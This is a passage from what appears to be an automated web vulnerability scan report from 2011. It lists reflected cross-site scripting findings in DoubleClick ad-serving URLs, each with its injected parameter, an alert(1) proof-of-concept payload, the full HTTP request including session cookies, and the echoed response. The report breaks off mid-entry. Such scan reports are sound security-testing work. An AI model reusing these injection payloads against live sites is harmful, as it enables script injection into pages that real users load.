Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:36 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6814

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
0/f/7e/%2a/n%3B234167733%3B2-0%3B0%3B57514523%3B933-120/600%3B41089600/41107387/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=389c6c'-alert(1)-'73fc593881c&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2956869%26camid%3D5095412%26plaid%3D57514523%26creid%3D41089600%26adgid%3D234167733%26l1%3Dhttp%253A
...[SNIP]...

4.19. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68d2a"-alert(1)-"e05a90d3bd2 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=368d2a"-alert(1)-"e05a90d3bd2&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:32 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6736

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
= "http://s0.2mdn.net/2981993/120x600_030411_CPO_GENERIC.jpg";
var minV = 6;
var FWH = ' width="120" height="600" ';
var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=368d2a"-alert(1)-"e05a90d3bd2&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2952619%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp%253A
...[SNIP]...

4.20. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f31f6'-alert(1)-'d0891efa218 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855f31f6'-alert(1)-'d0891efa218&m=3&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:28 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6736

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
/3ad0/f/7e/%2a/p%3B234167733%3B1-0%3B0%3B57514523%3B933-120/600%3B40960228/40978015/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855f31f6'-alert(1)-'d0891efa218&m=3&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2948384%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp%
...[SNIP]...

4.21. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d1c2"-alert(1)-"4b605587bb4 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=5138555d1c2"-alert(1)-"4b605587bb4&m=3&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:23 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6778

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
gif = "http://s0.2mdn.net/2981993/120x600_031811_FREE_PHONES.jpg";
var minV = 6;
var FWH = ' width="120" height="600" ';
var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=5138555d1c2"-alert(1)-"4b605587bb4&m=3&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2943603%26camid%3D5095412%26plaid%3D57514523%26creid%3D41205115%26adgid%3D234167733%26l1%3Dhttp%
...[SNIP]...

4.22. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98471'-alert(1)-'72c05b45424 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=5411398471'-alert(1)-'72c05b45424&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:45 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6789

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
/a%3B234167733%3B0-0%3B0%3B57514523%3B933-120/600%3B40789782/40807569/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=5411398471'-alert(1)-'72c05b45424&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2965384%26camid%3D5095412%26plaid%3D57514523%26creid%3D40789782%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252F
...[SNIP]...

4.23. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f733"-alert(1)-"083c600f6c8 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=541135f733"-alert(1)-"083c600f6c8&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:40 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6736

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
/s0.2mdn.net/2981993/120x600_030411_CPO_GENERIC.jpg";
var minV = 6;
var FWH = ' width="120" height="600" ';
var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=541135f733"-alert(1)-"083c600f6c8&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2961119%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252F
...[SNIP]...

4.24. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd29a"-alert(1)-"95130e758d8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134dd29a"-alert(1)-"95130e758d8&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:14 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6778

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
S.swf";
var gif = "http://s0.2mdn.net/2981993/120x600_031811_FREE_PHONES.jpg";
var minV = 6;
var FWH = ' width="120" height="600" ';
var url = escape("http://media.fastclick.net/w/click.here?cid=232134dd29a"-alert(1)-"95130e758d8&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2934962%26camid%3D5095412%26plaid%3D57514523%26creid%3D41205115%26adgid%3D234167733%2
...[SNIP]...

4.25. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57012'-alert(1)-'cc2251629ad was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=23213457012'-alert(1)-'cc2251629ad&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:19 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6778

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
ck%3Bh%3Dv8/3ad0/f/7e/%2a/g%3B234167733%3B3-0%3B0%3B57514523%3B933-120/600%3B41205115/41222902/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=23213457012'-alert(1)-'cc2251629ad&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2939384%26camid%3D5095412%26plaid%3D57514523%26creid%3D41205115%26adgid%3D234167733%2
...[SNIP]...

4.26. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [tp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa4b0"-alert(1)-"3a43cb8c8f2 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3fa4b0"-alert(1)-"3a43cb8c8f2&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:30:59 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:30:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6778

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
net/2981993/120x600_031811_FREE_PHONES.jpg";
var minV = 6;
var FWH = ' width="120" height="600" ';
var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3fa4b0"-alert(1)-"3a43cb8c8f2&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2979416%26camid%3D5095412%26plaid%3D57514523%26creid%3D41205115%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252Fwww.veriz
...[SNIP]...

4.27. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [tp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.134236.9345108740621/B5095412.5

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62c27'-alert(1)-'c032322ba12 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=362c27'-alert(1)-'c032322ba12&forced_click=;ord=20110320172908? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:31:03 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:31:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6789

document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write(
...[SNIP]...
67733%3B0-0%3B0%3B57514523%3B933-120/600%3B40789782/40807569/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=362c27'-alert(1)-'c032322ba12&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2983634%26camid%3D5095412%26plaid%3D57514523%26creid%3D40789782%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252Fwww.veriz
...[SNIP]...

4.28. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dad7c"-alert(1)-"cc5c582c61a was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0dad7c"-alert(1)-"cc5c582c61a&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:16:55 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:16:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6130

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3ad0/f/7e/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0dad7c"-alert(1)-"cc5c582c61a&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den");
var fscU
...[SNIP]...

4.29. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 196a4'-alert(1)-'232e8879f was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0196a4'-alert(1)-'232e8879f&tp=7&forced_click=;ord=20110320171328? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/buchscr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 17:16:59 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:16:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6122

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Mar 04 04:54:27 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3ad0/f/7c/%2a/f%3B237656391%3B0-0%3B0%3B61005935%3B2321-160/600%3B41012153/41029940/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0196a4'-alert(1)-'232e8879f&tp=7&forced_click=https%3a%2f%2fchrome.google.com/webstore/detail/nielaigelomefgdoljcpfgbdbfefhdjc%3Futm_source%3Den-oa-na-us-N5295.150800.VALUECLICK%26utm_medium%3Doa%26utm_campaign%3Den\">
...[SNIP]...

4.30. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [forced_click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.150800.VALUECLICK/B5319645.4

Issue detail

